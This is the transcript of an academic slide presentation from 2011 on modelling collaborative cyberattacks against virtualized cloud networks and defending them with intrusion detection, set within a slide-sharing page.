Presentation is loading. Please wait.

Presentation is loading. Please wait.

Research Direction Introduction Advisor: Professor Frank, Y.S. Lin Presented by Chi-Hsiang Chan 2011/10/111.

Published byMaryann Jefferson Modified over 8 years ago

Similar presentations

Presentation on theme: "Research Direction Introduction Advisor: Professor Frank, Y.S. Lin Presented by Chi-Hsiang Chan 2011/10/111."— Presentation transcript:

1 Research Direction Introduction Advisor: Professor Frank, Y.S. Lin Presented by Chi-Hsiang Chan 2011/10/111

2 Agenda  Introduction  Collaborative Attack  Virtualization  Problem description  Scenario 2011/10/112

3 Agenda  Introduction  Collaborative Attack  Virtualization  Problem description  Scenario 2011/10/113

4 Collaborative Attack  Collaborative attacks are characterized by the prevalence of coordination before and during attacks. [1]  Collaborative attacks in general would involve multiple human attackers or criminal organizations that have respective adversarial expertise but may not fully trust each other.  Collaborative attacks are more powerful than the sum of the underlying individual attacks that can be launched by the individual attackers independently. 2011/10/114

5 Collaborative Attack 2011/10/115

6 Collaborative Attack  Time-aspect of Collaborative Attack C&C  Off-line coordination  During the attack, there are no communications between the attackers, nor communications between the commander and attackers.  On-line coordination  The commander and attackers may have communications and adjustments during a attack.  Real-time coordination  In this case, both attackers and commanders are always updated with the current global system state information.  Powerful: off-line < on-line < real-time 2011/10/116

7 Collaborative Attack  Space-aspect of Collaborative Attack C&C  Centralized C&C  A single attacker that is coordinating the collaborative attacks.  Distributed C&C  There are multiple attackers for commanding the adversarial computers to launch attacks. May be a hierarchical structure inside.  Peer-to-peer C&C  The multiple attackers play equal roles.  Sophisticated: centralized < distributed < peer-to-peer 2011/10/117

8 Collaborative Attack  Effect of Collaborative Attacks  Spatially collaborative attacks  The set of adversarial compeers, which are located in different geographic or network places, ate coordinated to launch attacks against a target at the same time.  Temporally collaborative attacks  The attack may proceed in a well orchestrated fashion. Each step of the attack process may be launch by different attackers, which may reside at different geographic or network places.  Hybrid collaborative attacks 2011/10/118

9 Collaborative Attack  Information Exchange during Collaborative Attacks  One-way  Information may only e sent from on participant to another, but not other direction. May decrease the chance that attackers are detected.  Two-way  This case allow the sharing of situational awareness, which may be needed in order to launch sophisticated attacks. 2011/10/119

10 Collaborative Attack  Privacy Aspect of Collaborative Attacks  Exploiting anonymous channels  Enforcing content privacy  Exploiting anonymous channels and enforcing content privacy 2011/10/1110

11 Collaborative Attack  Advantages of Collaborative Attack [2]  Coordinated attacks could be designed to avoid detection.  It is difficult to differentiate between decoy and actual attacks.  There is a large variety of coordinated attacks. 2011/10/1111

12 Virtualization  Definition  Virtualization refers to technologies designed to provide a layer of abstraction between computer hardware systems and the software running on them.[3] Source: vmware 2011/10/1112

13 Virtualization  Benefit  cost down  efficiency  scalability  easy to have multiple operating system environment  increase the space utilization efficiency in your data center by server consolidation  Virtualization is the key to cloud computing 2011/10/1113

14 IDS  an Intrusion detection system (IDS) is a security system that monitors computer systems and network traffic and analyzes that traffic for possible hostile attacks originating from outside the organization and also for system misuse or attacks originating from inside the organization.[4]  Do more protect than firewall which filter incoming traffic from the Internet. 2011/10/1114

15 IDS  Two types of IDS  Host IDS(HIDS)  Network IDS(NIDS)  The trade-off is evident when comparing HIDS and NIDS  NIDS offers high attack resistance at the cost of visibility.  HIDS offers high visibility but sacrifice attack resistance. 2011/10/1115

16 Agenda  Introduction  Collaborative Attack  Virtualization  Problem description  Scenario 2011/10/1116

17 Problem Description 2011/10/1117

18 Attacker View  Commander  Attackers  Initial location  Budget  Capability  Objective  Steal confidential information  Service disruption 2011/10/1118

19 Defender View  Special Defense Resource  Cost budget  VM IDS (Signature) [5]  Cloud security service  Costless(Decrease QoS)  VM local defense  Dynamic topology reconfiguration [6] 2011/10/1119

20 Per Hop Decision  Period decision  Early stage  Late stage  Strategy decision by criteria  compromise → risk avoidance  pretend to attack → risk tolerance  No. of Attackers  Choose ideal attackers  Aggressiveness  Attack Energy  Budget  Capability 2011/10/1120

21 Time Issue  Attackers  Compromise time  Recovery time  Defender  Signature generate  Reconfiguration impact QoS 2011/10/1121

22 Synergy  Pros  Decrease Budget cost of each attacker  Less recovery time  Less compromise time  Cons  Probability of detected 2011/10/1122

23 Early Period, Risk Avoidance  Purpose  Try to compromise nodes as fast as they can  Keep the stronger attackers for compromise core nodes 2011/10/1123

24 Agenda  Introduction  Collaborative Attack  Virtualization  Problem description  Scenario 2011/10/1124

25 Scenario General nodeCore nodeCloud security agent VMM environment Third party’s defense center Cloud security provider 2011/10/1125

26 Scenario A B C D E F G H I J 2011/10/1126

27 Early Stage Attack Strategy A B C D E F G H I J 2011/10/1127

28 Local Defense A B C D E F G H I J 2011/10/1128

29 IPDS request signature A B C D E F G H I J Signature generating… 2011/10/1129

30 Late Stage Attack Strategy Signature generating… A B C D E F G H I J 2011/10/1130

31 Attack VMM Signature generating… A B C D E F G H I J 2011/10/1131

32 Risk Level 、 Reconfiguration Signature generating… A B C D E F G H I J 2011/10/1132

33 Cloud Security Service Signature generating… A B C D E F G H I J 2011/10/1133

34 Transfer Signature A B C D E F G H I J 2011/10/1134

35 Failure of Attacker A B C D E F G H I J 2011/10/1135

36 Failure of Defender A B C D E F G H I J 2011/10/1136

37 Thanks for your listening!! 2011/10/1137

38 Reference  [1] S. Xu, “Collaborative Attack vs. Collaborative Defense”, Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering, Volume 10, Part 2, pp.217-228, 2009  [2] S. Braynov and M. Jadliwala, “Representation and Analysis of Coordinated Attacks”, FMSE'03, 2003  [3] J. K. Waters, “Virtualization Definition and Solutions”, 2008, http://www.cio.com/article/40701/Virtualization_Definition_and_Sol utions http://www.cio.com/article/40701/Virtualization_Definition_and_Sol utions  [4] SANS Institute InfoSec Reading Room, "Intrusion Detection Systems: Definition, Need and Challenges," 2001.  [5] T. Garfinkel and M. Rosenblum, “A Virtual Machine Introspection Based Architecture for Intrusion Detection”, Proc. Network and Distributed Systems Security Symposium, 2003 2011/10/1138

39 Reference  [6] M. Atighetchi, P. Pal, F. Webber and C. Jones, “Adaptive Use of Network-Centric Mechanisms in Cyber-Defense”, BBN Technologies LLC 2011/10/1139

40 Appendix 2011/10/1140

41 Host-based IDS  HIDS obtains information by watching local activity on a host :  processes, system calls, logs, etc.  Advantages :  Detailed information about system activities.  Greater accuracy and fewer false positives.  Weakness :  Highly dependent on host systems.  Can be deactivated or tampered by a successful intruder. 2011/10/1141

42 Network-based IDS  NIDS obtains data by monitoring the traffic in the network.  Advantages :  Operating System-independent.  Can detect attack attempts outside the firewall.  Difficult for attackers to displace their evidences.  Weakness :  In high-traffic networks, a network monitor could potentially miss packets, or become a bottleneck.  Hard to get detailed information of hosts. 2011/10/1142

43 Period  N : The total numbers of nodes in the Defense Networks.  F : The total numbers of node which is compromised in the Defense Networks. 2011/10/1143

44 Selection Criteria 2011/10/1144

45 No. of Attackers  M : Number of selected candidates  Success Rate (SR) = Risk Avoidance Compromised / Risk Avoidance Attacks 2011/10/1145

Download ppt "Research Direction Introduction Advisor: Professor Frank, Y.S. Lin Presented by Chi-Hsiang Chan 2011/10/111."

Similar presentations

1 Intrusion Monitoring of Malicious Routing Behavior Poornima Balasubramanyam Karl Levitt Computer Security Laboratory Department of Computer Science UCDavis.

1 Intrusion Monitoring of Malicious Routing Behavior Poornima Balasubramanyam Karl Levitt Computer Security Laboratory Department of Computer Science UCDavis.
Computer and Network Security Mini Lecture by Milica Barjaktarovic.

Computer and Network Security Mini Lecture by Milica Barjaktarovic.
1 Chapter 7 Intrusion Detection. 2 Objectives In this chapter, you will: Understand intrusion detection benefits and problems Learn about network intrusion.

1 Chapter 7 Intrusion Detection. 2 Objectives In this chapter, you will: Understand intrusion detection benefits and problems Learn about network intrusion.
Ragib Hasan Johns Hopkins University en.600.412 Spring 2011 Lecture 11 04/25/2011 Security and Privacy in Cloud Computing.

Ragib Hasan Johns Hopkins University en Spring 2011 Lecture 11 04/25/2011 Security and Privacy in Cloud Computing.
Research Direction Introduction Advisor : Frank, Y.S. Lin Presented by Yu Pu Wu.

Research Direction Introduction Advisor : Frank, Y.S. Lin Presented by Yu Pu Wu.
1. AGENDA History. WHAT’S AN IDS? Security and Roles Types of Violations. Types of Detection Types of IDS. IDS issues. Application.

1. AGENDA History. WHAT’S AN IDS? Security and Roles Types of Violations. Types of Detection Types of IDS. IDS issues. Application.
1 Cryptography and Network Security Third Edition by William Stallings Lecturer: Dr. Saleem Al_Zoubi.

1 Cryptography and Network Security Third Edition by William Stallings Lecturer: Dr. Saleem Al_Zoubi.
Chapter 12 Network Security.

Chapter 12 Network Security.
MSIT 458: Information Security & Assurance By Curtis Pethley.

MSIT 458: Information Security & Assurance By Curtis Pethley.
Lecture III : Communication Security, Services & Mechanisms Internet Security: Principles & Practices John K. Zao, PhD SMIEEE National Chiao-Tung University.

Lecture III : Communication Security, Services & Mechanisms Internet Security: Principles & Practices John K. Zao, PhD SMIEEE National Chiao-Tung University.
NETWORK SECURITY INTRUSION DETECTION SYSTEMS (IDS) KANDIAH.M Clarkson University, Potsdam, New York.

NETWORK SECURITY INTRUSION DETECTION SYSTEMS (IDS) KANDIAH.M Clarkson University, Potsdam, New York.
An Integrated Framework for Dependable Revivable Architectures Using Multi-core Processors Weiding Shi, Hsien-Hsin S. Lee, Laura Falk, and Mrinmoy Ghosh.

An Integrated Framework for Dependable Revivable Architectures Using Multi-core Processors Weiding Shi, Hsien-Hsin S. Lee, Laura Falk, and Mrinmoy Ghosh.
Beyond the perimeter: the need for early detection of Denial of Service Attacks John Haggerty,Qi Shi,Madjid Merabti Presented by Abhijit Pandey.

Beyond the perimeter: the need for early detection of Denial of Service Attacks John Haggerty,Qi Shi,Madjid Merabti Presented by Abhijit Pandey.
Lesson 13-Intrusion Detection. Overview Define the types of Intrusion Detection Systems (IDS). Set up an IDS. Manage an IDS. Understand intrusion prevention.

Lesson 13-Intrusion Detection. Overview Define the types of Intrusion Detection Systems (IDS). Set up an IDS. Manage an IDS. Understand intrusion prevention.
UNCLASSIFIED Secure Indirect Routing and An Autonomous Enterprise Intrusion Defense System Applied to Mobile ad hoc Networks J. Leland Langston, Raytheon.

UNCLASSIFIED Secure Indirect Routing and An Autonomous Enterprise Intrusion Defense System Applied to Mobile ad hoc Networks J. Leland Langston, Raytheon.
m 1 University of Palestine Student / Mahmoud Elqedra Assistant Professor / Dr. Sana’a Wafa Al-Sayegh.

m 1 University of Palestine Student / Mahmoud Elqedra Assistant Professor / Dr. Sana’a Wafa Al-Sayegh.
Virtual Machine approach to Security Gautam Prasad and Sudeep Pradhan 10/05/2010 CS 239 UCLA.

Virtual Machine approach to Security Gautam Prasad and Sudeep Pradhan 10/05/2010 CS 239 UCLA.
Intrusion Detection Systems CS391. Overview  Define the types of Intrusion Detection Systems (IDS).  Set up an IDS.  Manage an IDS.  Understand intrusion.

Intrusion Detection Systems CS391. Overview  Define the types of Intrusion Detection Systems (IDS).  Set up an IDS.  Manage an IDS.  Understand intrusion.
Lecture 11 Intrusion Detection (cont)

Lecture 11 Intrusion Detection (cont)
Game-based Analysis of Denial-of- Service Prevention Protocols Ajay Mahimkar Class Project: CS 395T.

Game-based Analysis of Denial-of- Service Prevention Protocols Ajay Mahimkar Class Project: CS 395T.

Similar presentations

Ads by Google